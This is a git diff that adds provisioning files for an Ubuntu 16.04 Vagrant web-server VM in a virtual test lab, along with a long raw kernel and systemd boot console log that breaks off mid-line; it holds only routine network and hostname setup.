@@ +/home/jive/space/gittin/VeepExploit/virt-lab/edgers/web-server \ No newline at end of file diff --git a/virtual-test-environment/edgers/web-server/Vagrantfile b/virtual-test-environment/edgers/web-server/Vagrantfile new file mode 100644 index 0000000..8545714 --- /dev/null +++ b/virtual-test-environment/edgers/web-server/Vagrantfile @@ -0,0 +1,19 @@ +# -*- mode: ruby -*- + +# vi: set ft=ruby : + +Vagrant.configure(2) do |config| + config.vm.box = "ubuntu/xenial64" + config.vm.hostname = "vague-web-server" + + config.vm.network "forwarded_port", guest: 22, host: 22113, id: 'ssh' + config.ssh.insert_key = true + config.vm.network "private_network", ip: "192.168.3.2", virtualbox__intnet: "intnet-3" + + config.vm.provider "virtualbox" do |vb| + vb.name = "vague-web-server" + end + + config.vm.provision :shell, path: "setup_net.sh" + +end diff --git a/virtual-test-environment/edgers/web-server/copy_dns_setup.sh b/virtual-test-environment/edgers/web-server/copy_dns_setup.sh new file mode 100755 index 0000000..b20ae47 --- /dev/null +++ b/virtual-test-environment/edgers/web-server/copy_dns_setup.sh @@ -0,0 +1,9 @@ +#!/bin/bash +# + + +echo Copying dns setup scripts to dns VM.. + +scp -r -i .vagrant/machines/default/virtualbox/private_key -P 22113 ../setups/dns/* vagrant@localhost:~ + + diff --git a/virtual-test-environment/edgers/web-server/setup_net.sh b/virtual-test-environment/edgers/web-server/setup_net.sh new file mode 100755 index 0000000..aaf0bd9 --- /dev/null +++ b/virtual-test-environment/edgers/web-server/setup_net.sh @@ -0,0 +1,14 @@ +#!/bin/bash +# + + +OLD_NAME=vague-client +HNAME=webserver + +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hostname +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hosts +hostname $HNAME + +sed -i "s/#VAGRANT-END/up route add -net 192.168.0.0\/16 gw 192.168.3.254 dev enp0s8/g" /etc/network/interfaces +#/etc/init.d/networking restart +exit diff --git a/virtual-test-environment/edgers/web-server/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/edgers/web-server/ubuntu-xenial-16.04-cloudimg-console.log new file mode 100644 index 0000000..89fe650 --- /dev/null +++ b/virtual-test-environment/edgers/web-server/ubuntu-xenial-16.04-cloudimg-console.log @@ -0,0 +1,648 @@ +[ 0.000000] Initializing cgroup subsys cpuset +[ 0.000000] Initializing cgroup subsys cpu +[ 0.000000] Initializing cgroup subsys cpuacct +[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) +[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] KERNEL supported cpus: +[ 0.000000] Intel GenuineIntel +[ 0.000000] AMD AuthenticAMD +[ 0.000000] Centaur CentaurHauls +[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' +[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. +[ 0.000000] e820: BIOS-provided physical RAM map: +[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable +[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved +[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable +[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data +[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved +[ 0.000000] NX (Execute Disable) protection: active +[ 0.000000] SMBIOS 2.5 present. +[ 0.000000] Hypervisor detected: KVM +[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 +[ 0.000000] MTRR: Disabled +[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. +[ 0.000000] CPU MTRRs all blank - virtualized system. +[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC +[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] +[ 0.000000] Scanning 1 areas for low memory corruption +[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] +[ 0.000000] ACPI: Early table checksum verification disabled +[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) +[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) +[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) +[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) +[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) +[ 0.000000] No NUMA configuration found +[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] +[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] +[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 +[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock +[ 0.000000] kvm-clock: using sched offset of 4300726245 cycles +[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns +[ 0.000000] Zone ranges: +[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] +[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] +[ 0.000000] Normal empty +[ 0.000000] Device empty +[ 0.000000] Movable zone start for each node +[ 0.000000] Early memory node ranges +[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] +[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] +[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] +[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 +[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) +[ 0.000000] Using ACPI (MADT) for SMP configuration information +[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs +[ 0.000000] PM: Registered nosave memory: [mem 0x00000000-0x00000fff] +[ 0.000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] +[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI devices +[ 0.000000] Booting paravirtualized kernel on KVM +[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns +[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 +[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 +[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 +[ 0.000000] Policy zone: DMA32 +[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) +[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) +[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 +[ 0.000000] Kernel/User page tables isolation: enabled +[ 0.000000] Hierarchical RCU implementation. +[ 0.000000] Build-time adjustment of leaf fanout to 64. +[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. +[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 +[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 +[ 0.000000] Console: colour VGA+ 80x25 +[ 0.000000] console [tty1] enabled +[ 0.000000] console [ttyS0] enabled +[ 0.000000] tsc: Detected 2207.998 MHz processor +[ 0.575042] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) +[ 0.583719] pid_max: default: 32768 minimum: 301 +[ 0.589265] ACPI: Core revision 20150930 +[ 0.597268] ACPI: 2 ACPI AML tables successfully acquired and loaded +[ 0.602962] Security Framework initialized +[ 0.605820] Yama: becoming mindful. +[ 0.608917] AppArmor: AppArmor initialized +[ 0.613142] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) +[ 0.621886] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) +[ 0.625904] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 0.632797] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 0.640010] Initializing cgroup subsys io +[ 0.641861] Initializing cgroup subsys memory +[ 0.646365] Initializing cgroup subsys devices +[ 0.650708] Initializing cgroup subsys freezer +[ 0.654877] Initializing cgroup subsys net_cls +[ 0.660436] Initializing cgroup subsys perf_event +[ 0.662136] Initializing cgroup subsys net_prio +[ 0.664624] Initializing cgroup subsys hugetlb +[ 0.668553] Initializing cgroup subsys pids +[ 0.702382] mce: CPU supports 0 MCE banks +[ 0.704296] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 +[ 0.709690] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 +[ 0.714547] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization +[ 0.720968] Spectre V2 : Mitigation: Full generic retpoline +[ 0.724802] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch +[ 0.730770] Speculative Store Bypass: Vulnerable +[ 0.734372] SRBDS: Unknown: Dependent on hypervisor status +[ 0.737588] MDS: Mitigation: Clear CPU buffers +[ 0.748139] Freeing SMP alternatives memory: 36K +[ 0.760919] ftrace: allocating 32339 entries in 127 pages +[ 0.887852] smpboot: APIC(0) Converting physical 0 to logical package 0 +[ 0.890169] smpboot: Max logical packages: 1 +[ 0.892305] x2apic enabled +[ 0.895379] Switched APIC routing to physical x2apic. +[ 0.900676] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 +[ 1.011887] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) +[ 1.021469] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. +[ 1.052923] KVM setup paravirtual spinlock +[ 1.058553] x86: Booting SMP configuration: +[ 1.064047] .... node #0, CPUs: #1 +[ 1.084173] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock +[ 1.121613] mce: CPU supports 0 MCE banks +[ 1.133994] x86: Booted up 1 node, 2 CPUs +[ 1.136440] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) +[ 1.140689] devtmpfs: initialized +[ 1.145419] evm: security.selinux +[ 1.147142] evm: security.SMACK64 +[ 1.148476] evm: security.SMACK64EXEC +[ 1.149876] evm: security.SMACK64TRANSMUTE +[ 1.151392] evm: security.SMACK64MMAP +[ 1.152821] evm: security.ima +[ 1.154297] evm: security.capability +[ 1.164021] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns +[ 1.167742] futex hash table entries: 512 (order: 3, 32768 bytes) +[ 1.185759] pinctrl core: initialized pinctrl subsystem +[ 1.188561] RTC time: 22:38:15, date: 01/25/21 +[ 1.194323] NET: Registered protocol family 16 +[ 1.222445] cpuidle: using governor ladder +[ 1.234673] cpuidle: using governor menu +[ 1.243003] PCCT header not found. +[ 1.244661] ACPI: bus type PCI registered +[ 1.246119] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 +[ 1.253790] PCI: Using configuration type 1 for base access +[ 1.271286] ACPI: Added _OSI(Module Device) +[ 1.278089] ACPI: Added _OSI(Processor Device) +[ 1.280804] ACPI: Added _OSI(3.0 _SCP Extensions) +[ 1.283686] ACPI: Added _OSI(Processor Aggregator Device) +[ 1.288993] ACPI: Executed 1 blocks of module-level executable AML code +[ 1.297022] ACPI: Interpreter enabled +[ 1.298650] ACPI: (supports S0 S5) +[ 1.301397] ACPI: Using IOAPIC for interrupt routing +[ 1.306020] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug +[ 1.321414] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) +[ 1.326869] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] +[ 1.330933] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] +[ 1.339279] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. +[ 1.350721] PCI host bridge to bus 0000:00 +[ 1.355753] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] +[ 1.366668] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] +[ 1.371136] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] +[ 1.379429] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] +[ 1.386375] pci_bus 0000:00: root bus resource [bus 00-ff] +[ 1.398571] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] +[ 1.406737] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] +[ 1.412737] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] +[ 1.444886] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] +[ 1.505211] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI +[ 1.513970] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB +[ 1.555570] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) +[ 1.588357] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) +[ 1.635129] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) +[ 1.663658] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) +[ 1.670973] ACPI: Enabled 2 GPEs in block 00 to 07 +[ 1.676792] vgaarb: setting as boot device: PCI:0000:00:02.0 +[ 1.677897] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none +[ 1.698863] vgaarb: loaded +[ 1.710492] vgaarb: bridge control possible 0000:00:02.0 +[ 1.723397] SCSI subsystem initialized +[ 1.725861] ACPI: bus type USB registered +[ 1.726976] usbcore: registered new interface driver usbfs +[ 1.752574] usbcore: registered new interface driver hub +[ 1.772215] usbcore: registered new device driver usb +[ 1.811617] PCI: Using ACPI for IRQ routing +[ 1.816358] NetLabel: Initializing +[ 1.851996] NetLabel: domain hash size = 128 +[ 1.860481] NetLabel: protocols = UNLABELED CIPSOv4 +[ 1.872951] NetLabel: unlabeled traffic allowed by default +[ 1.876921] amd_nb: Cannot enumerate AMD northbridges +[ 1.882216] clocksource: Switched to clocksource kvm-clock +[ 1.899768] AppArmor: AppArmor Filesystem Enabled +[ 1.922433] pnp: PnP ACPI init +[ 1.924150] pnp: PP ACPI: fond 3 devices + +[ 2.018708] clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns +[ 2.021249] NET: Registered protocol fily 2 + +[ 2.144059] TCP established hash table entries: 8192 (order: 4, 65536 bytes) +[ 2.147997] TCP bind hash table entries: 8192 (order: 5, 131072 bytes) +[ 2.149346] TCP: Hash tables confiured (established 8192 bind 8192) +[ 2.227607] UDP hash table entries: 512 (order: 2, 16384 bytes) +[ 2.231478] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) +[ 2.243419] NET: Registered protocol family 1 +[ 2.247564] pci 0000:00:00.0: Limiting direct PCPCItransfers +[ 2.400035] pci 0000:00:01.0: Activating ISA DMA hang workarounds +[ 2.407063] Unpacking initramfs... + +[ 3.036235] Freeing initrd memory: 14880K +[ 3.056585] clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1fd3b6211b4, max_idle_ns: 440795230313 ns +[ 3.095888] platform rtc_cmos: registered platform RTC device (no PNP device found) +[ 3.124566] Scanning for low memory corruption every 60 seconds +[ 3.126155] audit: initializing netlink subsys (disabled) +[ 3.175576] audit: type=2000 audit(1611614301.900:1): initialized +[ 3.177099] Initialise system trusted keyring +[ 3.225742] HugeTLB registered 2 MB page size, pre-allocated 0 pages +[ 3.232683] zbud: loaded +[ 3.261923] VFS: Disk quotas dquot_6.6.0 +[ 3.272145] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes) +[ 3.273698] squashfs: version 4.0 (2009/01/31) Phillip Lougher +[ 3.276216] fuse init (API version 7.23) +[ 3.297437] Key type big_key registered +[ 3.304135] Allocating IMA MOK and blacklist keyrings. +[ 3.321176] Key type asymmetric registered +[ 3.329651] Asymmetric key parser 'x509' registered +[ 3.335978] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 249) +[ 3.339896] io scheduler noop registered +[ 3.340878] io scheduler deadline registered (default) +[ 3.341937] io scheduler cfq registered +[ 3.372270] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 +[ 3.378695] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 +[ 3.380257] ACPI: AC Adapter [AC] (on-line) +[ 3.381394] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 +[ 3.388427] ACPI: Power Button [PWRF] +[ 3.389461] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input1 +[ 3.414885] ACPI: Sleep Button [SLPF] +[ 3.426173] ACPI: Battery Slot [BAT0] (battery present) +[ 3.426239] GHES: HEST is not enabled! +[ 3.426398] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled +[ 3.469347] 00:02: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A +[ 3.477770] Linux agpgart interface v0.103 +[ 3.492058] loop: module loaded +[ 3.493484] scsi host0: ata_piix +[ 3.496318] scsi host1: ata_piix +[ 3.497145] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0xd000 irq 14 +[ 3.498487] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0xd008 irq 15 +[ 3.503407] libphy: Fixed MDIO Bus: probed +[ 3.505103] tun: Universal TUN/TAP device driver, 1.6 +[ 3.506095] tun: (C) 1999-2004 Max Krasnyansky + 3.517785] PPP generic driver version 2.4.2 +[ 3.591736] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver +[ 3.612121] ehci-pci: EHCI PCI platform driver +[ 3.621981] ehci-platform: EHCI generic platform driver +[ 3.628241] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver +[ 3.634677] ohci-pci: OHCI PCI platform driver +[ 3.635620] ohci-platform: OHCI generic platform driver +[ 3.659878] uhci_hcd: USB Universal Host Controller Interface driver +[ 3.668560] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f03:PS2M] at 0x60,0x64 irq 1,12 +[ 3.671741] serio: i8042 KBD port at 0x60,0x64 irq 1 +[ 3.686717] serio: i8042 AUX port at 0x60,0x64 irq 12 +[ 3.698853] mousedev: PS/2 mouse device common for all mice +[ 3.724753] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input2 +[ 3.736563] rtc_cmos rtc_cmos: rtc core: registered rtc_cmos as rtc0 +[ 3.744336] rtc_cmos rtc_cmos: alarms up to one day, 114 bytes nvram +[ 3.768396] i2c /dev entries driver +[ 3.783048] device-mapper: uevent: version 1.0.3 +[ 3.796348] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: dm-devel@redhat.com +[ 3.798124] ledtrig-cpu: registered to indicate activity on CPUs +[ 3.830428] NET: Registered protocol family 10 +[ 3.831670] NET: Registered protocol family 17 +[ 3.857652] Key type dns_resolver registered +[ 3.864214] registered taskstats version 1 +[ 3.868439] Loading compiled-in X.509 certificates +[ 3.875843] Loaded X.509 cert 'Build time autogenerated kernel key: b89e9ea735e1dbde81c7786f041ecf1d53e71c2e' +[ 3.883843] zswap: loaded using pool lzo/zbud +[ 3.904214] Key type trusted registered +[ 3.916783] Key type encrypted registered +[ 3.924786] AppArmor: AppArmor sha1 policy hashing enabled +[ 3.926027] ima: No TPM chip found, activating TPM-bypass! +[ 3.942553] ima: Allocated hash algorithm: sha1 +[ 3.950671] evm: HMAC attrs: 0x1 +[ 3.956026] Magic number: 5:763:654 +[ 3.974063] rtc_cmos rtc_cmos: setting system clock to 2021-01-25 22:38:18 UTC (1611614298) +[ 4.000216] BIOS EDD facility v0.16 2004-Jun-25, 0 devices found +[ 4.002461] EDD information not available. +[ 4.011381] Freeing unused kernel memory: 1492K +[ 4.038332] Write protecting the kernel read-only data: 14336k +[ 4.039964] Freeing unused kernel memory: 1592K +[ 4.133703] Freeing unused kernel memory: 56K +Loading, please wait... +starting version[ 4.160957] random: systemd-udevd: uninitialized urandom read (16 bytes read, 5 bits of entropy available) + 229 +[ 4.161653] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.161684] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.180156] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.180211] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.180366] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.180428] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.180492] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.180554] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.180614] random: udevadm: uninitialized urandom read (16 bytes read, 5 bits of entropy available) +[ 4.354614] e1000: Intel(R) PRO/1000 Network Driver - version 7.3.21-k8-NAPI +[ 4.357483] e1000: Copyright (c) 1999-2006 Intel Corporation. +[ 4.359986] Fusion MPT base driver 3.04.20 +[ 4.362475] Copyright (c) 1999-2008 LSI Corporation +[ 4.369112] Fusion MPT SPI Host driver 3.04.20 +[ 4.386455] AVX2 version of gcm_enc/dec engaged. +[ 4.388632] AES CTR mode by8 optimization enabled +[ 4.671496] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input4 +[ 4.873896] e1000 0000:00:03.0 eth0: (PCI:33MHz:32-bit) 02:83:3c:85:18:ff +[ 4.876355] e1000 0000:00:03.0 eth0: Intel(R) PRO/1000 Network Connection +[ 4.888424] mptbase: ioc0: Initiating bringup +[ 5.432969] ioc0: LSI53C1030 A0: Capabilities={Initiator} +[ 6.420288] scsi host2: ioc0: LSI53C1030 A0, FwRev=00000000h, Ports=1, MaxQ=256, IRQ=20 +[ 7.074728] scsi 2:0:0:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 7.076780] scsi target2:0:0: Beginning Domain Validation +[ 7.079222] scsi target2:0:0: Domain Validation skipping write tests +[ 7.080761] scsi target2:0:0: Ending Domain Validation +[ 7.082590] scsi target2:0:0: asynchronous +[ 7.087412] scsi 2:0:1:0: Direct-Access VBOX HARDDISK 1.0 PQ: 0 ANSI: 5 +[ 7.089869] scsi target2:0:1: Beginning Domain Validation +[ 7.092211] scsi target2:0:1: Domain Validation skipping write tests +[ 7.093721] scsi target2:0:1: Ending Domain Validation +[ 7.097186] scsi target2:0:1: asynchronous +[ 7.184155] sd 2:0:0:0: Attached scsi generic sg0 type 0 +[ 7.188086] sd 2:0:1:0: Attached scsi generic sg1 type 0 +[ 7.194855] sd 2:0:0:0: [sda] 20971520 512-byte logical blocks: (10.7 GB/10.0 GiB) +[ 7.197807] sd 2:0:1:0: [sdb] 20480 512-byte logical blocks: (10.5 MB/10.0 MiB) +[ 7.199951] sd 2:0:0:0: [sda] Write Protect is off +[ 7.201561] sd 2:0:0:0: [sda] Incomplete mode parameter data +[ 7.208120] sd 2:0:0:0: [sda] Assuming drive cache: write through +[ 7.210229] sd 2:0:1:0: [sdb] Write Protect is off +[ 7.218523] sd 2:0:1:0: [sdb] Incomplete mode parameter data +[ 7.220347] sd 2:0:1:0: [sdb] Assuming drive cache: write through +[ 7.245530] sda: sda1 +[ 7.261105] sd 2:0:0:0: [sda] Attached SCSI disk +[ 7.284137] sd 2:0:1:0: [sdb] Attached SCSI disk +[ 7.582110] e1000 0000:00:08.0 eth1: (PCI:33MHz:32-bit) 08:00:27:48:2b:b0 +[ 7.627459] e1000 0000:00:08.0 eth1: Intel(R) PRO/1000 Network Connection +[ 7.651176] e1000 0000:00:08.0 enp0s8: renamed from eth1 +[ 7.686548] e1000 0000:00:03.0 enp0s3: renamed from eth0 +Begin: Loading essential drivers ... [ 9.714246] md: linear personality registered for level -1 +[ 9.729404] md: multipath personality registered for level -4 +[ 9.744495] md: raid0 personality registered for level 0 +[ 9.763889] md: raid1 personality registered for level 1 +[ 9.866297] raid6: sse2x1 gen() 4645 MB/s +[ 9.934328] raid6: sse2x1 xor() 2570 MB/s +[ 10.002463] raid6: sse2x2 gen() 6232 MB/s +[ 10.076201] raid6: sse2x2 xor() 1782 MB/s +[ 10.162391] raid6: sse2x4 gen() 3845 MB/s +[ 10.230586] raid6: sse2x4 xor() 5943 MB/s +[ 10.299643] raid6: avx2x1 gen() 10133 MB/s +[ 10.370262] raid6: avx2x2 gen() 7019 MB/s +[ 10.439282] raid6: avx2x4 gen() 6788 MB/s +[ 10.459392] raid6: using algorithm avx2x1 gen() 10133 MB/s +[ 10.460593] raid6: using avx2x2 recovery algorithm +[ 10.498745] xor: automatically using best checksumming function: +[ 10.573826] avx : 11989.000 MB/sec +[ 10.615514] async_tx: api initialized (async) +[ 10.874590] md: raid6 personality registered for level 6 +[ 10.905904] md: raid5 personality registered for level 5 +[ 10.918809] md: raid4 personality registered for level 4 +[ 10.975507] md: raid10 personality registered for level 10 +done. +Begin: Running /scripts/init-premount ... done. +Begin: Mounting root file system ... Begin: Running /scripts/local-top ... done. +Begin: Running /scripts/local-premount ... [ 11.162185] Btrfs loaded +Scanning for Btrfs filesystems +done. +Warning: fsck not present, so skipping root file system +[ 11.248627] EXT4-fs (sda1): INFO: recovery required on readonly filesystem +[ 11.252196] EXT4-fs (sda1): write access will be enabled during recovery +[ 11.443014] EXT4-fs (sda1): recovery complete +[ 11.465874] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null) +done. +Begin: Running /scripts/local-bottom ... done. +Begin: Running /scripts/init-bottom ... done. +[ 11.709683] systemd[1]: systemd 229 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN) +[ 11.756548] systemd[1]: Detected virtualization oracle. +[ 11.782332] systemd[1]: Detected architecture x86-64. + +Welcome to Ubuntu 16.04.7 LTS! + +[ 11.816017] systemd[1]: Set hostname to . +[ 12.168541] ranom nolokingpol is initialized +[ 12.885554] systemd[1]: Listening on /dev/initctl Compatibility Named Pipe. +[ OK ] Listening on /dev/initctl Compatibility Named Pipe. +[ 12.969913] systemd[1]: Listening on udev Kernel Socket. +[ OK ] Listening on udev Kernel Socket. +[ 13.025691] systemd[1]: Listening on Journal Socket (/dev/log). +[ OK ] Listening on Journal Socket (/dev/log). +[ 13.042969] systemd[1]: Reached target User and Group Name Lookups. +[ OK ] Reached target User and Group Name Lookups. +[ 13.114578] systemd[1]: Listening on Device-mapper event daemon FIFOs. +[ OK ] Listening on Device-mapper event daemon FIFOs. +[ 13.149310] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point. +[ OK ] Set up automount Arbitrary Executab...ats File System Automount Point. +[ 13.203203] systemd[1]: Created slice System Slice. +[ OK ] Created slice System Slice. +[ 13.234550] systemd[1]: Listening on udev Control Socket. +[ OK ] Listening on udev Control Socket. +[ 13.254582] systemd[1]: Listening on LVM2 poll daemon socket. +[ OK ] Listening on LVM2 poll daemon socket. +[ 13.296617] systemd[1]: Started Forward Password Requests to Wall Directory Watch. +[ OK ] Started Forward Password Requests to Wall Directory Watch. +[ 13.343238] systemd[1]: Reached target System Time Synchronized. +[ OK ] Reached target System Time Synchronized. +[ 13.371883] systemd[1]: Listening on Journal Audit Socket. +[ OK ] Listening on Journal Audit Socket. +[ 13.418640] 